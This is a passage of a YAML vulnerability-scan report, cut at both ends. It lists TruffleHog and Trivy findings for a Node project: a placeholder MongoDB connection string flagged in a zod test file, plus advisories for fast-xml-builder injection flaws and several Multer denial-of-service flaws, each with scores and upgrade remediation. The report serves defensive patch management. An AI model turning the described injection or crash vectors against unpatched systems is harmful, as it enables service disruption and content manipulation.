+ - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f911dc46b3477b87 + ruleId: MongoDB + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts + startLine: 0 + message: mongodb://username:password@host:1234/?authSource=admin&connectTimeoutMS=300000 + title: MongoDB secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts + line: 652 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 895 + DetectorName: MongoDB + DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented + data model. MongoDB credentials can be used to access and manipulate the database. + DecoderName: PLAIN + Verified: false + VerificationError: context deadline exceeded + VerificationFromCache: false + Raw: mongodb://username:password@host:1234/?authSource=admin&connectTimeoutMS=300000 + RawV2: '' + Redacted: '' + ExtraData: + rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: *id001 + nistCsf2_0: + - *id002 + - *id003 + pciDss4_0: + - *id004 + - *id005 + mitreAttack: + - *id006 + - *id007 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7e52e475110f77c7 + ruleId: CVE-2026-3449 + severity: LOW + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: '@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect + control flow scoping with AbortSignal' + title: CVE-2026-3449 + description: Versions of the package @tootallnate/once before 3.0.1 are vulnerable + to Incorrect Control Flow Scoping in promise resolving when AbortSignal option + is used. The Promise remains in a permanently pending state after the signal is + aborted, causing any await or .then() usage to hang indefinitely. This can cause + a control-flow leak that can lead to stalled requests, blocked workers, or degraded + application availability. + remediation: https://avd.aquasec.com/nvd/cve-2026-3449 + references: [] + tags: + - vulnerability + - pkg:@tootallnate/once@2.0.0 + risk: + cwe: &id008 + - CWE-705 + raw: + VulnerabilityID: CVE-2026-3449 + VendorIDs: + - GHSA-vpq2-c234-7xj6 + PkgID: '@tootallnate/once@2.0.0' + PkgName: '@tootallnate/once' + PkgIdentifier: + PURL: pkg:npm/%40tootallnate/once@2.0.0 + UID: 22f57853d23edc3a + InstalledVersion: 2.0.0 + FixedVersion: 3.0.1 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-3449 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:605e4b5b1300db1ed54e9a7df765bc7aac56fb87edbbdfda3669e95ed6e21109 + Title: '@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect + control flow scoping with AbortSignal' + Description: Versions of the package @tootallnate/once before 3.0.1 are vulnerable + to Incorrect Control Flow Scoping in promise resolving when AbortSignal option + is used. The Promise remains in a permanently pending state after the signal + is aborted, causing any await or .then() usage to hang indefinitely. This can + cause a control-flow leak that can lead to stalled requests, blocked workers, + or degraded application availability. + Severity: LOW + CweIDs: *id008 + VendorSeverity: + ghsa: 1 + redhat: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L + V40Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P + V3Score: 3.3 + V40Score: 1.9 + redhat: + V3Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L + V3Score: 4 + References: + - https://access.redhat.com/security/cve/CVE-2026-3449 + - https://github.com/TooTallNate/once + - https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a + - https://github.com/TooTallNate/once/issues/8 + - https://nvd.nist.gov/vuln/detail/CVE-2026-3449 + - https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612 + - https://www.cve.org/CVERecord?id=CVE-2026-3449 + PublishedDate: '2026-03-03T05:17:25.017Z' + LastModifiedDate: '2026-05-19T15:38:48.397Z' + context: + sbom: + name: '@tootallnate/once' + version: 2.0.0 + path: /package-lock.json + compliance: + cisControlsV8_1: &id010 + - control: '7.1' + title: Establish and Maintain a Vulnerability Management Process + implementationGroup: IG1 + - control: '7.2' + title: Establish and Maintain a Remediation Process + implementationGroup: IG1 + - control: '7.3' + title: Perform Automated Operating System Patch Management + implementationGroup: IG1 + - control: '7.4' + title: Perform Automated Application Patch Management + implementationGroup: IG2 + - control: '16.11' + title: Leverage Vetted Modules or Services for Application Security Components + implementationGroup: IG2 + nistCsf2_0: + - &id011 + function: IDENTIFY + category: ID.RA + subcategory: ID.RA-1 + description: Asset vulnerabilities are identified and documented + - &id012 + function: GOVERN + category: GV.SC + subcategory: GV.SC-3 + description: Cybersecurity supply chain risk management processes are identified, + established, assessed, managed, and agreed upon by organizational stakeholders + pciDss4_0: + - &id013 + requirement: 6.3.3 + description: Security vulnerabilities are identified and managed + priority: CRITICAL + - &id014 + requirement: 11.3.1 + description: Internal vulnerability scans are performed + priority: HIGH + mitreAttack: + - &id015 + tactic: Initial Access + technique: T1195 + techniqueName: Supply Chain Compromise + subtechnique: T1195.001 + subtechniqueName: Compromise Software Dependencies and Development Tools + priority: + priority: 6.671466666666666 + epss: 0.00018 + epss_percentile: 0.04653 + is_kev: false + kev_due_date: null + components: + severity_score: 2 + epss_multiplier: 1.00072 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 3bc7bf0933f4ab4f + ruleId: CVE-2026-44665 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'fast-xml-builder: fast-xml-builder: Attribute injection leading to information + disclosure or content manipulation' + title: CVE-2026-44665 + description: fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input + data has quotes in attribute values but process entities is not enabled, it breaks + the attribute value into multiple attributes. This gives the room for an attacker + to insert unwanted attributes to the XML/HTML. This vulnerability is fixed in + 1.1.7. + remediation: https://avd.aquasec.com/nvd/cve-2026-44665 + references: [] + tags: + - vulnerability + - pkg:fast-xml-builder@1.1.5 + risk: + cwe: &id009 + - CWE-91 + raw: + VulnerabilityID: CVE-2026-44665 + VendorIDs: + - GHSA-5wm8-gmm8-39j9 + PkgID: fast-xml-builder@1.1.5 + PkgName: fast-xml-builder + PkgIdentifier: + PURL: pkg:npm/fast-xml-builder@1.1.5 + UID: e589910a79395ad7 + InstalledVersion: 1.1.5 + FixedVersion: 1.1.7 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44665 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:8e7a89527407be2fe370bc613bdc370fc1331784b6adb3ded33d177053fe6763 + Title: 'fast-xml-builder: fast-xml-builder: Attribute injection leading to information + disclosure or content manipulation' + Description: fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input + data has quotes in attribute values but process entities is not enabled, it + breaks the attribute value into multiple attributes. This gives the room for + an attacker to insert unwanted attributes to the XML/HTML. This vulnerability + is fixed in 1.1.7. + Severity: HIGH + CweIDs: *id009 + VendorSeverity: + ghsa: 3 + redhat: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N + V3Score: 6.1 + V40Score: 8.7 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + V3Score: 6.1 + References: + - https://access.redhat.com/security/cve/CVE-2026-44665 + - https://github.com/NaturalIntelligence/fast-xml-builder + - https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-5wm8-gmm8-39j9 + - https://nvd.nist.gov/vuln/detail/CVE-2026-44665 + - https://www.cve.org/CVERecord?id=CVE-2026-44665 + PublishedDate: '2026-05-13T16:16:59.093Z' + LastModifiedDate: '2026-05-18T16:16:31.7Z' + context: + sbom: + name: fast-xml-builder + version: 1.1.5 + path: /package-lock.json + compliance: + owaspTop10_2021: + - A03:2021 + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.362266666666663 + epss: 0.00031 + epss_percentile: 0.09168 + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.00124 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 291094d0af7c4e5d + ruleId: CVE-2026-44664 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient + sanitization of XML comments' + title: CVE-2026-44664 + description: fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650 + in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g, + '- -'). This skip the values containing three consecutive dashes (e.g., --->...), + allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML + content. This vulnerability is fixed in 1.1.6. + remediation: https://avd.aquasec.com/nvd/cve-2026-44664 + references: [] + tags: + - vulnerability + - pkg:fast-xml-builder@1.1.5 + risk: + cwe: &id016 + - CWE-91 + raw: + VulnerabilityID: CVE-2026-44664 + VendorIDs: + - GHSA-45c6-75p6-83cc + PkgID: fast-xml-builder@1.1.5 + PkgName: fast-xml-builder + PkgIdentifier: + PURL: pkg:npm/fast-xml-builder@1.1.5 + UID: e589910a79395ad7 + InstalledVersion: 1.1.5 + FixedVersion: 1.1.6 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44664 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:b235fbfdb27300e8e1e953de27d6b5c66dca54b9c9cc963ff98909558f588a80 + Title: 'fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient + sanitization of XML comments' + Description: fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650 + in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g, + '- -'). This skip the values containing three consecutive dashes (e.g., --->...), + allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML + content. This vulnerability is fixed in 1.1.6. + Severity: MEDIUM + CweIDs: *id016 + VendorSeverity: + ghsa: 2 + redhat: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + V3Score: 6.1 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + V3Score: 6.1 + References: + - https://access.redhat.com/security/cve/CVE-2026-44664 + - https://github.com/NaturalIntelligence/fast-xml-builder + - https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-45c6-75p6-83cc + - https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6 + - https://nvd.nist.gov/vuln/detail/CVE-2026-44664 + - https://www.cve.org/CVERecord?id=CVE-2026-44664 + PublishedDate: '2026-05-13T16:16:58.937Z' + LastModifiedDate: '2026-05-13T16:58:09.717Z' + context: + sbom: + name: fast-xml-builder + version: 1.1.5 + path: /package-lock.json + compliance: + owaspTop10_2021: + - A03:2021 + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 13.349866666666665 + epss: 0.00031 + epss_percentile: 0.09168 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.00124 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 56ac1677596b7698 + ruleId: CVE-2025-47935 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Multer vulnerable to Denial of Service via memory leaks from unclosed streams + title: CVE-2025-47935 + description: Multer is a node.js middleware for handling `multipart/form-data`. + Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak + issue due to improper stream handling. When the HTTP request stream emits an error, + the internal `busboy` stream is not closed, violating Node.js stream safety guidance. + This leads to unclosed streams accumulating over time, consuming memory and file + descriptors. Under sustained or repeated failure conditions, this can result in + denial of service, requiring manual server restarts to recover. All users of Multer + handling file uploads are potentially impacted. Users should upgrade to 2.0.0 + to receive a patch. No known workarounds are available. + remediation: https://avd.aquasec.com/nvd/cve-2025-47935 + references: [] + tags: + - vulnerability + - pkg:multer@1.4.5-lts.2 + risk: + cwe: &id017 + - CWE-401 + raw: + VulnerabilityID: CVE-2025-47935 + VendorIDs: + - GHSA-44fp-w29j-9vj5 + PkgID: multer@1.4.5-lts.2 + PkgName: multer + PkgIdentifier: + PURL: pkg:npm/multer@1.4.5-lts.2 + UID: 99f2d2a7a48c940f + InstalledVersion: 1.4.5-lts.2 + FixedVersion: 2.0.0 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-47935 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:7f8818b1b132b22a748ea60a54eaf18eb75d31944d1ce65cec7d4f2223e52d5b + Title: Multer vulnerable to Denial of Service via memory leaks from unclosed streams + Description: Multer is a node.js middleware for handling `multipart/form-data`. + Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak + issue due to improper stream handling. When the HTTP request stream emits an + error, the internal `busboy` stream is not closed, violating Node.js stream + safety guidance. This leads to unclosed streams accumulating over time, consuming + memory and file descriptors. Under sustained or repeated failure conditions, + this can result in denial of service, requiring manual server restarts to recover. + All users of Multer handling file uploads are potentially impacted. Users should + upgrade to 2.0.0 to receive a patch. No known workarounds are available. + Severity: HIGH + CweIDs: *id017 + VendorSeverity: + ghsa: 3 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + References: + - https://github.com/expressjs/multer + - https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665 + - https://github.com/expressjs/multer/pull/1120 + - https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5 + - https://nvd.nist.gov/vuln/detail/CVE-2025-47935 + PublishedDate: '2025-05-19T20:15:25.863Z' + LastModifiedDate: '2026-04-15T00:35:42.02Z' + context: + sbom: + name: multer + version: 1.4.5-lts.2 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.498533333333334 + epss: 0.00177 + epss_percentile: 0.38785 + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.00708 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9a2891a28bad4ab6 + ruleId: CVE-2025-47944 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Multer vulnerable to Denial of Service from maliciously crafted requests + title: CVE-2025-47944 + description: Multer is a node.js middleware for handling `multipart/form-data`. + A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version + 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed + multi-part upload request. This request causes an unhandled exception, leading + to a crash of the process. Users should upgrade to version 2.0.0 to receive a + patch. No known workarounds are available. + remediation: https://avd.aquasec.com/nvd/cve-2025-47944 + references: [] + tags: + - vulnerability + - pkg:multer@1.4.5-lts.2 + risk: + cwe: &id018 + - CWE-248 + raw: + VulnerabilityID: CVE-2025-47944 + VendorIDs: + - GHSA-4pg4-qvpc-4q3h + PkgID: multer@1.4.5-lts.2 + PkgName: multer + PkgIdentifier: + PURL: pkg:npm/multer@1.4.5-lts.2 + UID: 99f2d2a7a48c940f + InstalledVersion: 1.4.5-lts.2 + FixedVersion: 2.0.0 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-47944 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:23b421e6283eb1e1891013d3b028a410e9f21dcf0cc9f237488d859219429598 + Title: Multer vulnerable to Denial of Service from maliciously crafted requests + Description: Multer is a node.js middleware for handling `multipart/form-data`. + A vulnerability that is present starting in version 1.4.4-lts.1 and prior to + version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending + a malformed multi-part upload request. This request causes an unhandled exception, + leading to a crash of the process. Users should upgrade to version 2.0.0 to + receive a patch. No known workarounds are available. + Severity: HIGH + CweIDs: *id018 + VendorSeverity: + ghsa: 3 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + References: + - https://github.com/expressjs/multer + - https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665 + - https://github.com/expressjs/multer/issues/1176 + - https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h + - https://nvd.nist.gov/vuln/detail/CVE-2025-47944 + PublishedDate: '2025-05-19T20:15:26.007Z' + LastModifiedDate: '2026-04-15T00:35:42.02Z' + context: + sbom: + name: multer + version: 1.4.5-lts.2 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.371600000000004 + epss: 0.00041 + epss_percentile: 0.12343 + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.00164 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d58f5341093c2113 + ruleId: CVE-2025-48997 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'multer: Multer vulnerable to Denial of Service via unhandled exception' + title: CVE-2025-48997 + description: Multer is a node.js middleware for handling `multipart/form-data`. + A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version + 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload + file request with an empty string field name. This request causes an unhandled + exception, leading to a crash of the process. Users should upgrade to `2.0.1` + to receive a patch. No known workarounds are available. + remediation: https://avd.aquasec.com/nvd/cve-2025-48997 + references: [] + tags: + - vulnerability + - pkg:multer@1.4.5-lts.2 + risk: + cwe: &id019 + - CWE-248 + raw: + VulnerabilityID: CVE-2025-48997 + VendorIDs: + - GHSA-g5hg-p3ph-g8qg + PkgID: multer@1.4.5-lts.2 + PkgName: multer + PkgIdentifier: + PURL: pkg:npm/multer@1.4.5-lts.2 + UID: 99f2d2a7a48c940f + InstalledVersion: 1.4.5-lts.2 + FixedVersion: 2.0.1 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-48997 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:b5423a207c7b90cb213319b29f5a6320e76fbba9b188f4193067f30445ba46ac + Title: 'multer: Multer vulnerable to Denial of Service via unhandled exception' + Description: Multer is a node.js middleware for handling `multipart/form-data`. + A vulnerability that is present starting in version 1.4.4-lts.1 and prior to + version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending + an upload file request with an empty string field name. This request causes + an unhandled exception, leading to a crash of the process. Users should upgrade + to `2.0.1` to receive a patch. No known workarounds are available. + Severity: HIGH + CweIDs: *id019 + VendorSeverity: + ghsa: 3 + redhat: 2 + CVSS: + ghsa: + V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N + V40Score: 8.7 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L + V3Score: 5.3 + References: + - https://access.redhat.com/security/cve/CVE-2025-48997 + - https://github.com/expressjs/multer + - https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9 + - https://github.com/expressjs/multer/issues/1233 + - https://github.com/expressjs/multer/pull/1256 + - https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg + - https://nvd.nist.gov/vuln/detail/CVE-2025-48997 + - https://www.cve.org/CVERecord?id=CVE-2025-48997 + PublishedDate: '2025-06-03T19:15:39.577Z' + LastModifiedDate: '2026-04-15T00:35:42.02Z' + context: + sbom: + name: multer + version: 1.4.5-lts.2 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.565733333333334 + epss: 0.00249 + epss_percentile: 0.48135 + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.00996 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 87e4175cbe5a176c + ruleId: CVE-2025-7338 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'multer: Multer Denial of Service' + title: CVE-2025-7338 + description: Multer is a node.js middleware for handling `multipart/form-data`. + A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version + 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed + multi-part upload request. This request causes an unhandled exception, leading + to a crash of the process. Users should upgrade to version 2.0.2 to receive a + patch. No known workarounds are available. + remediation: https://avd.aquasec.com/nvd/cve-2025-7338 + references: [] + tags: + - vulnerability + - pkg:multer@1.4.5-lts.2 + risk: + cwe: &id020 + - CWE-248 + raw: + VulnerabilityID: CVE-2025-7338 + VendorIDs: + - GHSA-fjgf-rc76-4x9p + PkgID: multer@1.4.5-lts.2 + PkgName: multer + PkgIdentifier: + PURL: pkg:npm/multer@1.4.5-lts.2 + UID: 99f2d2a7a48c940f + InstalledVersion: 1.4.5-lts.2 + FixedVersion: 2.0.2 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-7338 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:6f3feccc664d1f1e3cddf653f1c97b7118b5736ae9b6292dab66ae27058aa782 + Title: 'multer: Multer Denial of Service' + Description: Multer is a node.js middleware for handling `multipart/form-data`. + A vulnerability that is present starting in version 1.4.4-lts.1 and prior to + version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending + a malformed multi-part upload request. This request causes an unhandled exception, + leading to a crash of the process. Users should upgrade to version 2.0.2 to + receive a patch. No known workarounds are available. + Severity: HIGH + CweIDs: *id020 + VendorSeverity: + ghsa: 3 + redhat: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L + V3Score: 5.3 + References: + - https://access.redhat.com/security/cve/CVE-2025-7338 + - https://cna.openjsf.org/security-advisories.html + - https://github.com/expressjs/multer + - https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b + - https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p + - https://nvd.nist.gov/vuln/detail/CVE-2025-7338 + - https://www.cve.org/CVERecord?id=CVE-2025-7338 + PublishedDate: '2025-07-17T16:15:35.227Z' + LastModifiedDate: '2026-04-15T00:35:42.02Z' + context: + sbom: + name: multer + version: 1.4.5-lts.2 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.371600000000004 + epss: 0.00041 + epss_percentile: 0.12343 + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.00164 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2affafc067aeae6e + ruleId: CVE-2026-2359 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'multer: Multer: Denial of Service via dropped file upload connections' + title: CVE-2026-2359 + description: Multer is a node.js middleware for handling `multipart/form-data`. + A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger + a Denial of Service (DoS) by dropping connection during file upload, potentially + causing resource exhaustion. Users should upgrade to version 2.1.0 to receive + a patch. No known workarounds are available. + remediation: https://avd.aquasec.com/nvd/cve-2026-2359 + references: [] + tags: + - vulnerability + - pkg:multer@1.4.5-lts.2 + risk: + cwe: &id021 + - CWE-772 + raw: + VulnerabilityID: CVE-2026-2359 + VendorIDs: + - GHSA-v52c-386h-88mc + PkgID: multer@1.4.5-lts.2 + PkgName: multer + PkgIdentifier: + PURL: pkg:npm/multer@1.4.5-lts.2 + UID: 99f2d2a7a48c940f + InstalledVersion: 1.4.5-lts.2 + FixedVersion: 2.1.0 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-2359 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:aa2cbc6cc4142d36b776703b3db65cfa9d406900e6e0fc75d58c73b8897a08cd + Title: 'multer: Multer: Denial of Service via dropped file upload connections' + Description: Multer is a node.js middleware for handling `multipart/form-data`. + A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger + a Denial of Service (DoS) by dropping connection during file upload, potentially + causing resource exhaustion. Users should upgrade to version 2.1.0 to receive + a patch. No known workarounds are available. + Severity: HIGH + CweIDs: *id021 + VendorSeverity: + ghsa: 3 + nvd: 3 + redhat: 3 + CVSS: + ghsa: + V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N + V40Score: 8.7 + nvd: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + References: + - https://access.redhat.com/security/cve/CVE-2026-2359 + - https://cna.openjsf.org/security-advisories.html + - https://github.com/expressjs/multer + - https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab + - https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc + - https://nvd.nist.gov/vuln/detail/CVE-2026-2359 + - https://www.cve.org/CVERecord?id=CVE-2026-2359 + PublishedDate: '2026-02-27T16:16:25.467Z' + LastModifiedDate: '2026-03-19T17:28:16.05Z' + context: + sbom: + name: multer + version: 1.4.5-lts.2 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.351066666666668 + epss: 0.00019 + epss_percentile: 0.05291 + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.00076 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 80d0e617807f9c3a + ruleId: CVE-2026-3304 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'multer: Multer: Denial of Service via malformed requests' + title: CVE-2026-3304 + description: Multer is a node.js middleware for handling `multipart/form-data`. + A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger + a Denial of Service (DoS) by sending malformed requests, potentially causing resource + exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known + workarounds are available. + remediation: https://avd.aquasec.com/nvd/cve-2026-3304 + references: [] + tags: + - vulnerability + - pkg:multer@1.4.5-lts.2 + risk: + cwe: &id022 + - CWE-459 + raw: + VulnerabilityID: CVE-2026-3304 + VendorIDs: + - GHSA-xf7r-hgr6-v32p + PkgID: multer@1.4.5-lts.2 + PkgName: multer + PkgIdentifier: + PURL: pkg:npm/multer@1.4.5-lts.2 + UID: 99f2d2a7a48c940f + InstalledVersion: 1.4.5-lts.2 + FixedVersion: 2.1.0 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-3304 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: 